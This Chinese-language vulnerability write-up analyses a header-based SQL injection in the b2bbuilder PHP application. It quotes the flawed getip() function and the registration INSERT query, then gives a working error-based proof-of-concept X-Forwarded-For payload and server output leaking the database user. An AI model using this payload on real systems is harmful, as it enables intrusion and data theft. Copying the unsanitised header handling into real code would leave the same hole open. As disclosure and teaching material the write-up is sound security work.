By

Contents
  1. 1. 代码分析
  2. 2. 漏洞利用

代码分析

比较经典的xff sqli注入。b2bbuilder在有做addslash。但是获取ip的函数如下:

function getip()
{
    if (isset($_SERVER)) {
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
       $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
       $realip = $_SERVER['HTTP_CLIENT_IP'];
    } else {
       $realip = $_SERVER['REMOTE_ADDR'];
    }
    } else {
    if (getenv("HTTP_X_FORWARDED_FOR")) {
       $realip = getenv( "HTTP_X_FORWARDED_FOR");
    } elseif (getenv("HTTP_CLIENT_IP")) {
       $realip = getenv("HTTP_CLIENT_IP");
    } else {
       $realip = getenv("REMOTE_ADDR");
    }
    }
    return $realip;
}

很多地方都是用该函数获取ip,并且拼接到sql中执行。比如login.php,regiester.php等。其他地方也有,因为同一个原因,所以没有一一测试。以注册为例。

$ip=getip();$ip=empty($ip)?NULL:$ip;
    $nt=time();$regtime=date("Y-m-d H:i:s");

    $db=new dba($config['dbhost'],$config['dbuser'],$config['dbpass'],$config['dbname'],$config['dbport']);    

    $sql="select * from  ".ALLUSER." where user='$user' or email='$email'";
    $db->query($sql);
    if($db->num_rows())
        die("User name is have");
    //----------------
    if(!empty($config['user_reg'])&&$config['user_reg']!=3)
        $user_reg=$config['user_reg'];
    elseif($config['user_reg']==3)
        $user_reg=1;
    else
        $user_reg=2;
    //----------------        
    $sql="insert into ".ALLUSER."
     (user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
     values
     ('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')";
    $re=$db->query($sql);

103行开始。获取ip最终进入了

insert into ".ALLUSER."
 (user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
 values
 ('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')

测试修改xff为X-Forwarded-For: 1.1.1.1’,服务器返回:

insert into b2bbuilder_page_view
(url,ip,time,username,fileName)
values
('%2Fb2bbuilder%2Fregister.php','1.1.1.1'','2015-05-14 17:21:11','test','/b2bbuilder/register.php')You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2015-05-14 17:21:11','test','/b2bbuilder/register.php')' at line 4

漏洞利用

poc:X-Forwarded-For: 1.1.1.1’ or updatexml(1,concat(0x5c,user()),1) or ‘

insert into b2bbuilder_page_view
    (url,ip,time,username,fileName)
    values
    ('%2Fb2bbuilder%2Fregister.php','1.1.1.1' or updatexml(1,concat(0x5c,user()),1) or '','2015-05-14 19:27:43','test','/b2bbuilder/register.php')XPATH syntax error: '\root@localhost'
Contents
  1. 1. 代码分析
  2. 2. 漏洞利用